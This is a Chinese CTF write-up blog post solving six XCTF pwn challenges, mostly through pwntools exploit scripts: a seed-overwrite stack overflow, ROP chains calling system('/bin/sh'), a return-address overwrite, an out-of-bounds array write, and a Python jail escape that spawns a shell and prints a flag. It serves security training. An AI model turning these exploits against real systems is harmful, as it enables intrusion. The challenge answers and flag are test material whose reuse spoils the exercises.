
CTF-XCTF-Pwn-高手进阶区(1)

CTF-XCTF-高手进阶区(1)

0x1

dice_game

附件下载 dice_game.rar

可以通过栈溢出覆盖 seed,我将其覆盖成 0,然后在本地写一个程序输出 rand() 50 次的结果,再把这些结果依次发送过去就可以了

from pwn import *

# Verbose tube logging plus 64-bit word packing for this target.
context.update(log_level="debug", arch="amd64")
elf = ELF("dice_game")

# Tube placeholders rebound by pwn(); ``lib`` is never used in this script.
sh = lib = 0

# The 50 dice values rand() yields under the seed the payload writes, in order.
# Generated offline (see the write-up); target-specific data, kept verbatim.
answer = [2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1]
def pwn(ip,port,debug):
    """Drive the dice_game challenge binary (Python 2 pwntools script).

    Args:
        ip: Remote host, used when ``debug`` is not 1.
        port: Remote port, used when ``debug`` is not 1.
        debug: 1 spawns ``./dice_game`` locally; anything else connects to ip:port.

    Side effects: rebinds the module-level tube ``sh`` and ends in
    ``sh.interactive()``; returns nothing.
    """
    global sh
    global lib  # never assigned in this script; kept for parity with the other scripts
    if(debug == 1):
        sh = process("./dice_game")
    else:
        sh = remote(ip,port)
    sh.recvuntil("Welcome, let me know your name: ")
    # Per the write-up, the name is read without a length check, so the input
    # runs past the buffer into the RNG seed: 0x50-0x4 bytes of padding, then
    # one byte that becomes the seed.  Defensive takeaway: a bounded read sized
    # to the buffer, and a seed drawn from an unpredictable source, remove the
    # whole issue.
    # NOTE(review): the write-up says the seed is overwritten with 0, but the
    # payload's final byte is 0x32 -- confirm which seed ``answer`` was generated from.
    payload = '\x00' * (0x50-0x4) + "\x32"
    sh.send(payload)
    sh.recvuntil("Game ")
    # With the seed fixed, the 50 rand() outcomes are deterministic; ``answer``
    # lists them in order.  The recv() presumably just drains the next prompt.
    for i in answer:
        sh.sendline(str(i))
        sh.recv()
    sh.interactive()
if __name__ == "__main__":
    # debug=0 selects the remote target; pass 1 to run ./dice_game locally instead.
    pwn("111.198.29.45", 45778, debug=0)

0x2

warmup

附件下载 warmup.rar

典型的ROP题

from pwn import *

# Verbose tube logging plus 64-bit word packing for this target.
context.update(log_level="debug", arch="amd64")
elf = ELF("warmup")

# Tube placeholders rebound by pwn(); ``lib`` is never used in this script.
sh = lib = 0
def pwn(ip,port,debug):
    """Drive the warmup challenge binary (64-bit ROP; Python 2 pwntools script).

    Args:
        ip: Remote host, used when ``debug`` is not 1.
        port: Remote port, used when ``debug`` is not 1.
        debug: 1 spawns ``./warmup`` locally; anything else connects to ip:port.

    Side effects: rebinds the module-level tube ``sh`` and ends in
    ``sh.interactive()``; returns nothing.
    """
    global sh
    global lib  # never assigned in this script; kept for parity with the other scripts
    if(debug == 1):
        sh = process("./warmup")

    else:
        sh = remote(ip,port)
    # "pop rdi; ret" gadget at a fixed address, which only holds if the binary's
    # code is not position-independent -- confirm with checksec.
    pop_rdi_ret = 0x0000000000400713
    # 72 bytes of filler, then a two-call chain: gets(bss) reads a command string
    # into .bss, system(bss) runs it.  Both targets come from the PLT, so no libc
    # leak is needed.  The chain presumes no stack canary guards the return
    # address; stack protector plus a bounded read would defeat it.
    # Python 2 only: "a" * 72 is str and p64() returns str; under Python 3 the
    # concatenation raises TypeError.
    payload = "a" * 72 + p64(pop_rdi_ret) + p64(elf.bss()) + p64(elf.plt["gets"]) + p64(pop_rdi_ret) + p64(elf.bss()) + p64(elf.plt['system'])
    sh.send(payload)
    # Give the first stage time to reach gets() before the command string arrives.
    sleep(1)
    sh.sendline("/bin/sh\x00")
    sh.interactive()
if __name__ == "__main__":
    # debug=0 selects the remote target; pass 1 to run ./warmup locally instead.
    pwn("111.198.29.45", 31657, debug=0)

0x3

forgot

附件下载 forgot.rar

from pwn import *

# Verbose tube logging plus 32-bit word packing for this target.
context.update(log_level="debug", arch="i386")
elf = ELF("forgot")

# Tube placeholders rebound by pwn(); ``lib`` is never used in this script.
sh = lib = 0
def pwn(ip,port,debug):
    """Drive the forgot challenge binary (32-bit; Python 2 pwntools script).

    Args:
        ip: Remote host, used when ``debug`` is not 1.
        port: Remote port, used when ``debug`` is not 1.
        debug: 1 spawns ``./forgot`` locally; anything else connects to ip:port.

    Side effects: rebinds the module-level tube ``sh`` and ends in
    ``sh.interactive()``; returns nothing.
    """
    global sh
    global lib  # never assigned in this script; kept for parity with the other scripts
    if(debug == 1):
        sh = process("./forgot")

    else:
        sh = remote(ip,port)
    # Fixed address inside the binary.  The name suggests a routine that prints
    # the flag, but its body is not shown on this page -- confirm in a disassembler.
    getFlag = 0x080486CC
    sh.recvuntil("What is your name?")
    # First input: a leading "2", seven copies of the address, padded to 0x20 bytes.
    # Python 2 only: "2" + p32(...) is str + str; under Python 3 p32() returns
    # bytes and the concatenation raises TypeError.
    payload = "2" + p32(getFlag) * 7
    payload = payload.ljust(0x20,"a")
    sh.send(payload)
    sh.recvuntil("Enter the string to be validate")
    # Second input: 3 filler bytes then 18 copies of the address (75 bytes).
    # NOTE(review): the ljust(18 * 4) below is a no-op, since 3 + 18*4 = 75
    # already exceeds 72; kept as written.  Which copy ends up in a code pointer
    # is not shown here.  Defensive takeaway: both inputs rely on a write past a
    # fixed-size buffer -- bounding the reads closes the bug.
    payload = "aaa"+18 * p32(getFlag)
    payload = payload.ljust(18 * 4,"a")
    sh.send(payload)
    sh.sendline("123")
    sh.interactive()
if __name__ == "__main__":
    # debug=0 selects the remote target; pass 1 to run ./forgot locally instead.
    pwn("111.198.29.45", 36236, debug=0)

0x4

stack2

附件下载 stack2.rar

存在数组越界写,即通过 change number 可以实现栈内任意地址写

XCTF 服务器上没有 /bin/bash,所以可以取字符串 "/bin/bash" 最后两个字符(即 "sh")的地址作为参数传入,然后通过 ROP 调用 system

from pwn import *

# Verbose tube logging plus 32-bit word packing for this target.
context.update(log_level="debug", arch="i386")
elf = ELF("stack2")

# Tube placeholders rebound by pwn(); ``lib`` is never used in this script.
sh = lib = 0

def writeNum(num,position):
    """Store one value at an array index via the program's "change number" menu item.

    Per the write-up the index is not bounds-checked, so ``position`` may lie
    outside the array -- that missing check is the bug.  Each call is one menu
    round-trip on the module-level tube ``sh``: pick option 3, answer the index
    prompt, then answer the value prompt.  Returns None.
    """
    menu = "1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit"
    exchange = (
        (menu, "3"),
        ("which number to change:", str(position)),
        ("new number:", str(num)),
    )
    for prompt, reply in exchange:
        sh.recvuntil(prompt)
        sh.sendline(reply)

def writeROP(num,position):
    """Store a 32-bit value little-endian, one byte per writeNum() round-trip.

    The split keeps the original arithmetic: the low byte is ``num % 0x100``
    and the top byte is a plain ``num >> 24`` (unmasked), so ``num`` is
    expected to already fit in 32 bits.  Bytes land at ``position`` through
    ``position + 3``; the next free slot, ``position + 4``, is returned so
    successive values can be laid out back to back.
    """
    le_bytes = (
        num % 0x100,               # bits 0-7
        (num % 0x10000) >> 8,      # bits 8-15
        (num % 0x1000000) >> 16,   # bits 16-23
        num >> 24,                 # bits 24-31, not masked
    )
    for slot, value in enumerate(le_bytes):
        writeNum(value, position + slot)
    return position + 4

def pwn(ip,port,debug):
    """Drive the stack2 challenge binary (32-bit; Python 2 pwntools script).

    Args:
        ip: Remote host, used when ``debug`` is not 1.
        port: Remote port, used when ``debug`` is not 1.
        debug: 1 spawns ``./stack2`` locally; anything else connects to ip:port.

    Side effects: rebinds the module-level tube ``sh`` and ends in
    ``sh.interactive()``; returns nothing.
    """
    global sh
    global lib  # never assigned in this script; kept for parity with the other scripts

    if(debug == 1):

        sh = process("./stack2")

    else:

        sh = remote(ip,port)
    #0x080488F2  -- alternative address left by the author; its role is not shown on this page
    # NOTE(review): assigned but never used below; the chain is built from the
    # two addresses passed to writeROP() instead.
    getShell_addr = 0x0804859B

    sh.recvuntil("How many numbers you have:")

    sh.sendline("1")

    sh.recvuntil("Give me your numbers\n")

    sh.sendline("3")

    # Per the write-up, the index given to "change number" is not bounds-checked,
    # so byte writes can reach the saved return address.  0x84 is the index at
    # which the overwrite starts; the stack layout behind it is not shown here --
    # verify in a debugger.  Defensive takeaway: validating the index against the
    # array length stops this entire technique.
    offset = 0x84

    # First 4 bytes: presumably the call to system (write-up: "ROP 执行 system").
    offset = writeROP(0x080485B4,offset)

    # Next 4 bytes: the argument pointer.  0x08048980 is presumably the
    # "/bin/bash" string in the binary; +7 skips to its last two characters,
    # "sh", because the remote box has no /bin/bash (see write-up).
    offset = writeROP(0x08048980 + 7,offset)

    # Option 5 (exit) presumably returns from the vulnerable function, which is
    # when the overwritten return address takes effect.
    sh.recvuntil("1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit")

    sh.sendline("5")

    sh.interactive()

if __name__ == "__main__":
    # debug=0 selects the remote target; pass 1 to run ./stack2 locally instead.
    pwn("111.198.29.45", 48028, debug=0)

0x5

Escape_From_Jail-50

题目只给了 IP 和端口,连上去发现是一个 Python 终端,并且禁用了 import os、fopen 等功能

getattr(os,"system")("/bin/sh")	//这条代码可以不通过	import os 来调用os库里的代码
bin
boot
dev
etc
home
lib
lib32
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
find / -name flag
/home/ctf/flag
cat /home/ctf/flag
cyberpeace{8ea4ff446652fd6ec97eb041a4aba19e}

0x6

monkey

直接运行程序,它类似于一个 Python 终端;随意输入 print("123") 后有输出,接着随意输入 read,发现存在 readFile 函数

read("flag")	//会反弹flag
文章作者: 咲夜南梦
文章链接: http://yoursite.com/2019/06/28/CTF-XCTF-Pwn-%E9%AB%98%E6%89%8B%E8%BF%9B%E9%98%B6%E5%8C%BA(1)/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 咲夜南梦's 博客